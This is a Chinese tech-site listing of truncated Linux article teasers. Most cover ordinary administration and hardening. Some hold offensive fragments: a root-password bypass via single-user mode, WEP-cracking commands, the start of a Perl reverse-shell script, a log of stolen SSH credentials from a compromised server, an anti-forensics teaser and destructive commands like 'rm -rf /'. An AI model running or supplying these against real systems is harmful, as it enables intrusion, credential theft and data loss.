linux服务器:Linux服务器的安全隐患及相关防范对策
Linux启动后出现boot:提示时使用个特殊命令如Linuxsingle或Linux 1就能进入单用户模式(Single-User mode)这个命令非常有用比如忘记超级用户(root)密码重启系统在boot:提示下输入Linux single(或Linux 1)以超级用户进入系统后编辑Passwd文件去掉root行中x即可 防范对策: 以超级用户(root)进入系统编辑/e... [阅读全文]
linux创建文件命令:Linux创建文件命令的思路方法
本文讲解了Linux创建文件命令思路方法 ,希望对您学习有所帮助 创建文件夹 mkdir aaa mkdir -p aaa 创建文件命令 vi foo.txt emacs foo.txt echo "aaaa" foo.txt cat foo.txt 清除命令 foo.txt mkdir /home/u1 创建文件夹/home/u1 chown oracle /hom... [阅读全文]
unix用户权限:UNIX文件安全和权限
在终端输入: ls -l xxx.xxx (xxx.xxx是文件名)那么就会出现相类似信息主要都是这些:-rw-rw-r--共有10位数其中:最前面那个 - 代表是类型 中间那 3个 rw- 代表是所有者(user) 然后那 3个 rw- 代表是组群(group) 最后那 3个 r-- 代表是其他人(other)然后再解释下后面那9位数:r 表示文件可以被读(read) w 表示文件可以被写(wr... [阅读全文]
linuxarp:Linux/FreeBSD 一定程度上对应ARP欺骗的一种被动思路方法
注:虽然是07年文章但非常实用所以转过来了文章作者:Helvin信息来源:邪恶 8进制信息安全团队(Team)(www.eviloctal.com)首先对国内某些IDC不负责任行为表示抗议般欺骗机器通过ARP Request获得网关MAC然后同样思路方法获得你服务器MAC进行双向欺骗然后snfer密码挂马的类国内几乎所有IDC都是几百服务器公用个网关然后上百个服务器总有几个有漏洞然后你就被ARP欺... [阅读全文]
linux远程桌面连接:Linux下进行windows远程桌面连接
1首先去 http://www.rdesktop.org/ 下载个 rdesktop 然后 make ,make 安装下当然在fedora中直接 yum rdesktop 更方便2安装好的后就可以用了rdesktop --helprdesktop: invalid option -- '-'rdesktop: A Remote Desktop Protocol client.Version 1... [阅读全文]
更安全的linux网络:让Linux更安全的超简配置法
、磁盘分区 1、如果是新安装系统对磁盘分区应考虑安全性: 1)根目录(/)、用户目录(/home)、临时目录(/tmp)和/var目录应分开到区别磁盘分区; 2)以上各目录所在分区磁盘空间大小应充分考虑避免因某些原因造成分区空间用完而导致系统崩溃; 2、对于/tmp和/var目录所在分区大多数情况下不需要有suid属性所以应为这些分区添加nosuid属性; 思路方法:修改/etc/fst... [阅读全文]
bt3wep:BT3破解WEP
1、定要从U盘或光盘引导进入BT3(定不要在vmware中启动BT3)选第 4项进入文字模式,startx,在/pentest/wireless目录下面存放着工具 2、airmon //查看网卡监控状态 airmon-ng start wlan0 //启动指定无线网卡 airodump-ng -w 123 eth0 //般不需要执行 config //查看网卡有没有启动 3、首先要设置网... [阅读全文]
asp提权脚本:linux下提权反弹脚本
linux下提权反弹脚本!代码如下#!/usr/bin/perl -w # use strict; use Socket; use IO::Handle; ($#ARGV+1 != 2){ pr "$#ARGV $0 Remote_IP Remote_Port \n"; exit 1; } my... [阅读全文]
linux备份:详细Linux备份和恢复思路方法
无论什么系统最安全做法就是调试好后做个备份到时遇到什么大问题直接恢复出来方便而省事下面详细Linux备份和恢复思路方法: 备份和恢复系统承担着事前备份和事后恢复职能在当前高速发展网络环境下任何个网络上信息系统都不可能保证绝对安全只要有网络存在就会有来自网络形形色色威胁为了抵御网络攻击和入侵虽然我们引入了日趋成熟入侵检测系统、防火墙系统等黑客们入侵手段也日益高明他们总能找到这些系统安全漏洞及不... [阅读全文]
linuxpasswd文件:解析LINUX的passwd文件
通常在Linux系统中用户关键信息被存放在系统/etc/passwd文件中系统每个合法用户账号对应于该文件中行记录这行记录定义了每个用户账号属性下面是个passwd文件举例(部分摘录): root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin login daemon:x:2:2:daemon:/sbin:/sbin login .... [阅读全文]
linux发行版:10个具有特殊功能的linux发行版
Linux 发行版众多大家除了可以基于发行版流行程度进行选择外也可适当留意该发行版特定用途或许在另外场合该发行版正是你所需要今天我们将和大家分享 10 个具有特殊用途 Linux 发行版希望对你有用 .Scientic Linux 基于 Redhat由两个科学研究机构 Fermilab 和 CERN 合作开发适合对科学研究感兴趣个人或团体 官方主页:linux.org/"http://ww... [阅读全文]
深入理解linux内核:Linux文件权限隐藏的细节深入分析
linux是个安全操作系统她是以文件为基础而设计其文件权限是比较复杂可以用stat命令以及lsattr命令来显示某个文件详细信息: 可以看到文件权限含义是比较广先来看-rwxr-xr-x第位是文件类型它定义了用户只能某种方式来操作文件后面 9位是文件存取控制信息linux文件许可机制将用户分为 3类:文件属主u(user)、文件属组g(group)和其它用户o(other) 3类区别用户可以对文件... [阅读全文]
7个习惯:UNIX 高手的另外10 个习惯
让我们面对现实吧:坏习惯很难改变但是您已经熟悉习惯可能更难克服有时重新审视某些事情可能让您遇到“啊哈我没想到它能做到这点!”时刻在 Michael Stutz 优秀文章“UNIX 高手 10 个习惯”基础上本文将提供另外 10 个 UNIX 命令行命令、工具和技术可以使您成为更高效 UNIX 命令行高手 您应当采纳其他 10 个好习惯包括: 使用文件名自动完成功能 (file name com... [阅读全文]
linux端口:Linux操作系统下各端口列表汇总篇
著名端口 1 tcpmux TCP 端口服务多路复用 5 rje 远程作业入口 7 echo Echo 服务 9 discard 用于连接测试空服务 11 systat 用于列举连接了端口系统状态 13 daytime 给请求主机发送日期和时间 17 qotd 给连接了主机发送每日格言 18 msp 消息发送协议 19 chargen 生成服务;发送无止境流 20 ftp-... [阅读全文]
Linux操作系统常用安全检查思路方法概括介绍
检查系统密码文件,查看文件修改日期[root@fedora ~]# ls -l /etc/passwd查看passwd文件中有哪些特权用户[root@fedora ~]# awk -F: '$3= =0 {pr $1}' /etc/passwd查看系统里有没有空口令帐户awk -F: 'length($2)= =0 {pr $1}' /etc/shadow检查系统守护进程cat /etc/inet... [阅读全文]
linux技巧:安全宝典的保障Linux系统安全的 9大窍门技巧
当你使用Linux操作系统处理安全问题时下面些规则和窍门技巧也许会派上用场 1.在以root身份登录时避免做些常规工作这会减少你感染病毒风险并且可以防止你犯些 2.如果可能话在台远程机器上工作时尽量使用加密连接使用SSH来代替telnet、ftp、rsh、rlogin应当成为标准操作规范标准SSH安全性众所周知 3.尽量保持和网络有关最重要包最新最好订阅些相应邮件列表以获得bind、postfix... [阅读全文]
linux发行版: 3十种Linux操作系统发行版名称含义详解
独特开发模式造就了今天百家争鸣Linux各个发行版名字都代表哪些含义呢?下面是些常用版本感兴趣朋友起来看:1-Ubuntu这或许是今天最常见个Linux发行版了Ubuntu是个南非民族观念着眼于人们的间忠诚和联系该词来自于祖鲁语和科萨语大意是“人道待人”(对他人仁慈)另种翻译是:“天下共享信念连接起每个人”2-PCLinuxOS很明显它名称是PC+Linux+Operating 组合在起拥有类似W... [阅读全文]
chmod命令:chmod命令使用思路方法
指令名称 : chmod使用权限 : 所有使用者使用方式 : chmod [-cfvR] [--help] [--version] mode file…介绍说明 : linux/Unix 档案存取权限分为 3级 : 档案拥有者、群组、其他利用 chmod 可以藉以控制档案如何被他人所存取参数格式 :mode : 权限设定字串格式如下 : [ugoa…][[+-=][rwxX]…][,…]其中u 表... [阅读全文]
linux用户组:Linux 用户和用户组配置文件详解
(User)和用户组(Group)配置文件是系统管理员最应该了解和掌握系统基础文件的从另方面来说了解这些文件也是系统安全管理重要组成部份;做为个合格系统管理员应该对用户和用户组配置文件透彻了解才行; 、用户(User)相关; 谈到用户就不得不谈用户管理用户配置文件以及用户查询和管理控制工具;用户管理主要通过修改用户配置文件完成;用户管理控制工具最终目也是为了修改用户配置文件 什么是用户查询和... [阅读全文]
linux系统:linux系统目录作用介绍
安装Linux系统前有必要简单了解下Linux系统目录作用以便安装分区、安装等操作linux系统目录非常多也比较复杂所以这里只是根据自己理解对级系统目录作用作个简单介绍了解这些目录前必须了解个很重要常识Linux系统是将分区挂在系统目录(比如为/home目录单独挂个分区)而windows是将系统目录挂在分区(比如将系统目录挂在C盘)/这就是根目录有且只有个根目录所有目录都是从这里开始例如:当你在终... [阅读全文]
ssh工具:阻止SSH口令尝试工具软件Software
Fail2ban即可以用系统自带防火墙如Linuxiptables或FreeBSDipfw又可以换用tcpd此外还可以扩展到其它网络服务目前我主要使用在监控22端口以及 /var/log/secure日志主要是那些非法访问日志当发现某个IP在个定义时间段内尝试SSH密码失败达到个定义次数则利用 LINUXiptables阻止改IP个定义时间段当然也可以无期限阻止 下载地址http://fail2... [阅读全文]
linux常用命令:Linux常用命令(部分)
du 检查每个目录所占用空间 cal 查看日期 cal 11 1986 chmod 644 .log 改变权限8728b1e317x5Rrex chown bin bin .log 改变所有用户 chgrp apahe .log 改变属组 tar zxvf Acrobat_reader5.tar.gz 解压 ls -l 看权限 chmod 755 INSTALL 更改权限 ./IN... [阅读全文]
linuxrpm命令:Linux操作系统中RPM命令参数的使用详解
在Linux操作系统中有个系统软件Software包它功能类似于Windows里面“添加/删除”但是功能又比“添加/删除”强很多它就是Red Hat Package Manager(简称RPM) 此工具包最先是由Red Hat公司推出后来被其他Linux开发商所借用由于它为Linux使用者省去了很多时间所以被广泛应用于在Linux下安装、删除软件Software 下面就给大家介绍下它具... [阅读全文]
linux入侵:对一台linux肉鸡的简单手工入侵检测
by:vitter blog:blog.securitycn.net 今天发现台肉鸡上某人ssh连到另外台服务器上记录下了密码 [root@mail ~]# cat /tmp/sshpswd ldc:[email protected] 直接ssh上去 [root@mail ~]# ssh [email protected] [email protected]'s password:... [阅读全文]
backtrack4汉化:怎样汉化BackTrack 4
1: 安装中文软件Software包. # apt-get language-pack-kde-zh language-pack-kde-zh-base language-pack-zh language-pack-zh-base 2: 若有需要可, 打开这个文件/etc/apt/sources.list 添加软件Software源. deb http://ubuntu.dormforce... [阅读全文]
linux命令总结:肤浅整理总结linux安全
今天写了个以前学习linux安全心得体会希望和CU里兄弟多多交流和讨论网络安全是个非常重要课题而服务器是网络安全中最关键环节Linux被认为是个比较安全Internet服务器作为种开放源代码操作系统旦Linux系统中发现有安全漏洞Internet上来自世界各地志愿者会踊跃修补它然而系统管理员往往不能及时地得到信息并进行更正这就给黑客以可乘的机然而相对于这些系统本身安全漏洞更多安全问题是由不当配置造... [阅读全文]
linux入侵:Linux 入侵踪迹隐藏攻略
0.前言: 被警察叔叔请去喝茶时间很痛苦事情各位道长如果功力不够又喜欢出风头想必都有过这样“待遇”如何使自己在系统中隐藏更深是我们必须掌握基本功当然如果管理员真想搞你而他功力又足够足话相信没什么人能够真正“踏雪无痕”Forensic 和Anti-Forensic说到底只是你和管理员的间技术间较量而已貌似很少有专门说这个文章大部分就是下载个日志擦除软件Software然后运行下就可以了对小站可以但... [阅读全文]
dnf秒杀外挂:7条秒杀Linux的命令
如果您使用Linux,可千万要记得不要让傻孩子们敲入以下命令,尽管这些命令看上去相当复杂,但还是会对你系统造成严重影响. 有些会影响你和系统运行,有些会直接把你盘抹掉,这些命令几乎没有什么可以挽回余地. 1. Code: rm -rf / 这个很简单,根目录会被擦光. 2. Code: char esp __attribute__ ((section(”.tex... [阅读全文]
linux发行版本:Linux 各发行版本介绍及其优缺点
Linux最早由Linus Benedict Torvalds在1991年开始编写在这的前Richard Stallman创建了Free Software Foundation(FSF)组织以及GNU项目并不断编写创建GNU(此类许可方式均为GPL: General Public License)在不断有杰出员和开发者加入到GNU组织中后便造就了今天我们所看到Linux或称GNU/Linux L... [阅读全文]